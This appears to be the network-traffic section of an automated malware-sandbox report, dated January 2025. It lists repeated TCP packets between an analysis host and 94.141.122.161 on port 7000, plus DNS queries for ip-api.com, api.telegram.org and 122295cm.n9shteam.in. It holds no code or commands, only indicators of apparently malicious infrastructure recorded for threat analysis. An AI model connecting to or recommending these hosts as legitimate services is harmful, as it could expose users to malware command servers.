                                                                                            Jan 7, 2025 18:04:24.879072905 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:24.879213095 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:24.981872082 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:24.986715078 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.103498936 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:25.108381033 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.219805956 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.221709013 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:25.226519108 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.339751959 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:25.344743013 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.344772100 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.344893932 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.344917059 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.344994068 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.345032930 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.345062017 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.345164061 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.352946997 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:25.372010946 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.473001957 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:25.477994919 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.579339027 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:25.584291935 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.584316015 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.684673071 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:25.689626932 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.689728022 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:25.689883947 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.689955950 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.690046072 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.736280918 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.808760881 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:25.813668013 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.923158884 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:25.927987099 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:25.996202946 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.071331978 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.076205969 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.086649895 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.091655970 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.091687918 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.091722965 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.091785908 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.091865063 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.091958046 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.091996908 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.092058897 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.092107058 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.092228889 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.092298031 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.092319012 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.174676895 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.179563999 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.296736956 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.301637888 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.368298054 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.423122883 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.428019047 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.467173100 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.472079992 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472107887 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472129107 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472199917 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472265005 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472311974 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472348928 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472404003 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472443104 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472500086 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472510099 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472625017 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472634077 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.533252001 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.538094997 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.641114950 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.646059036 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.711139917 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.750549078 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.755459070 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.809746027 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.814727068 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814754963 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814764023 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814785957 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814836025 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814876080 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814944029 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815057039 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815067053 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815171003 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815180063 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815187931 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815208912 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.859855890 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.864727974 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.969301939 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.974199057 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.078587055 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.083539963 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.105067015 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.200073957 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.205080986 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205096006 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205105066 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205121040 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205136061 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.205218077 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205298901 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205353975 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205447912 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205488920 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205640078 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205899954 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.252805948 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.313087940 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.317913055 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.422370911 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.427246094 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.444185972 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.515889883 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.541471004 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.550158978 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.555064917 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555152893 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555237055 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555257082 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555273056 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555358887 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555402040 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555423021 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555438995 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555510044 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555521011 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555565119 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555602074 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.596247911 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.672058105 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.676928997 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.781851053 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.786968946 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.835072994 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.903346062 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.908291101 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.908349991 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.908406019 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.908406973 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.909532070 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.913211107 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.016253948 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.021148920 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.125588894 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.130458117 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.234935999 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.239933968 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.341548920 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.347594023 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.367548943 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.435566902 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.440586090 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440617085 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440665007 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440769911 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440779924 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440817118 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440910101 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440918922 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440922976 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440953016 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440970898 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.441034079 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.441042900 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.453815937 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.458682060 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.566313028 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.571176052 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.672375917 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.677428961 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.679954052 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.747437954 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.754403114 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754472971 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754506111 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754573107 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754606009 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754625082 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754679918 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.756771088 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.756802082 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.756866932 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.756907940 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.756927967 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.781794071 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.848238945 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.891659975 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.896531105 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.993002892 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.028546095 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:29.033449888 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.057358027 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:29.062269926 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062304974 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062355042 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062366009 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062427044 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062437057 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062479973 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062517881 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062597990 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062607050 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062612057 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062659025 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.062666893 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.142287016 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:29.148535967 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.250787973 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:29.255791903 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.300517082 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.359989882 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:29.371511936 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.404200077 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:29.409181118 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.409212112 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.409269094 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.409312963 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.409344912 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.409512043 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.409522057 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.409529924 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.409538984 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.409550905 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.409622908 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.469372988 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:29.474390030 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.578758001 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:29.583743095 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.648977041 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:29.776846886 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:34.025470972 CET499767000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:34.030363083 CET70004997694.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.065977097 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:34.070985079 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.071007013 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.071017981 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.071028948 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.071074009 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.071129084 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.071140051 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.071149111 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.071158886 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.071301937 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.075675011 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.075689077 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.075710058 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.075720072 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.075728893 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.075738907 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.075814962 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.075855017 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.075987101 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.259681940 CET70004997694.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.260473013 CET499767000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:34.265310049 CET70004997694.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.321001053 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.375389099 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:34.401947021 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:34.407011986 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407026052 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407046080 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407056093 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407064915 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407073021 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407090902 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407099009 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407138109 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407146931 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407186985 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407195091 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407264948 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407324076 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407334089 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407344103 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407361031 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407407999 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407454014 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407519102 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.407552004 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.645649910 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.687772036 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:34.717267036 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:34.722244978 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722259998 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722296953 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722306967 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722361088 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722372055 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722394943 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722404957 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722444057 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722454071 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722466946 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722533941 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722543001 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722553968 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722616911 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722625017 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722716093 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722723961 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722738981 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722793102 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:34.722819090 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:35.042685986 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:35.091119051 CET499827000192.168.2.794.141.122.161

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 7, 2025 18:02:08.538686037 CET6079753192.168.2.71.1.1.1
                                                                                            Jan 7, 2025 18:02:08.593575001 CET53607971.1.1.1192.168.2.7
                                                                                            Jan 7, 2025 18:03:13.071382999 CET5808253192.168.2.71.1.1.1
                                                                                            Jan 7, 2025 18:03:13.078114033 CET53580821.1.1.1192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.696494102 CET5830453192.168.2.71.1.1.1
                                                                                            Jan 7, 2025 18:04:26.711690903 CET53583041.1.1.1192.168.2.7

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Jan 7, 2025 18:02:08.538686037 CET192.168.2.71.1.1.10x7935Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 18:03:13.071382999 CET192.168.2.71.1.1.10xe3e1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 18:04:26.696494102 CET192.168.2.71.1.1.10x5c87Standard query (0)122295cm.n9shteam.inA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
